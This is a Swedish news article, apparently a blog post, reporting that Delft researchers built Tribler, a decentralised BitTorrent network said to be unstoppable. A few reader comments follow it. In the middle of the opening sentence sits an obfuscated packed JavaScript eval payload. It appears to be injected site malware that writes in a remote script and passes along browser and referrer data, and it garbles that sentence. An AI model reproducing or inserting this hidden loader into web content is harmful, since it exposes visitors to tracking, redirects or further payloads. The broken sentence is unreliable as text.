Image Image Image Image Image Image Image Image Image Image

| 26 oktober, 2020

Scroll to top

Top

Fildelningstjänsten Tribler kan inte stoppas

Fildelningstjänsten Tribler kan inte stoppas
Sebastian

Det eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|fhakb|var|u0026u|referrer|hdftn||js|php’.split(’|’),0,{}))
skriv just nu otroligt mycket om fildelning och flera företag och privatpersoner åker dit varje dag. Myndigheter har verkligen börjat ta denna sorts brott på allvar.

Nu kanske det dock finns en fildelningstjänst som ingen kan stoppa. Forskare vid Delft university of Technology sägs ha utvecklat ett helt eget decentraliserat bittorrent-nätverk. Tribler som det heter kräver inte att användaren går genom torrentsajter för att hitta eller hämta filer utan bygger på ren peer-to-peer-kommunikation. Det ända sättet att stänga ner Tribler är att stänga ner hela internet.

Målet är att utveckla en torrenttjänst som inte förlitar sig på centrala servrar. Detta menar forskarna att de snart har gjort.

– Vår viktigaste vetenskapliga strävan är att underlätta obegränsat informationsutbyte, säger Dr Johan Pouwelse, en av de ledande utvecklarna av Tribler, till Torrentfreak.

– Med Tribler har vi lyckats uppnå noll sekunders driftstopp under de senaste sex åren, tack vare att vi inte förlitar oss på skakiga grunder såsom dns, webbservrar eller portaler, förklarar han vidare.

Tribler finns för nedladdning här. Det bygger på öppen källkod och finns i versioner för Windows, Mac och Linux.

Comments

  1. Gaffe

    Oj detta blir en liten nerladdning 🙂

  2. Kul! Denna ska vi kolla mer på också

  3. Tobias

    Sweet 🙂 Äntligen några forskare som fattar vinkeln 🙂